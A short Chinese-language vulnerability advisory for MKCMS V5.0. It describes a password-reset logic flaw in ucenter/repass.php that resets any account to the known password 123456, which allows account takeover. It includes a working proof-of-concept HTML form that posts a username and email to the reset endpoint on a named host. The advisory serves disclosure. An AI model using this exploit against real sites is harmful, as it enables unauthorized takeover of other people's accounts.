MKCMS V5.0存在逻辑漏洞

一、漏洞摘要

漏洞名称: MKCMS V5.0存在逻辑漏洞
上报日期: 2019-04-18
漏洞发现者: topsec_lizhongcheng
产品首页: https://micool.net/1090.html
软件链接: https://www.lanzous.com/i2ipcre
版本: V5.0

二、漏洞概述

      1.找回密码的处理逻辑存在漏洞，导致可以接管任意账号 : ucenter/ repass.php
        $username 通过post请求过来，接着查询数据库是否存在对应的记录；md5加密后（123456）直接插入数据库，最后通过邮件发送给对应的邮箱账号。所以这里重置后，密码    是可知道的，导致可以接管对应账号

三、利用代码

      1.构造如下poc.html,并访问poc.html，然后用123456密码登录即可

<html>

  <body>

  <script>history.pushState('', '', '/')</script>

    <form action="http://v.micool.top/ucenter/repass.php" method="POST">

      <input type="hidden" name="u&#95;name" value="lduo123" />

      <input type="hidden" name="u&#95;email" value="admin&#64;gmail&#46;com" />

      <input type="submit" value="Submit request" />

    </form>                         

  </body>

</html>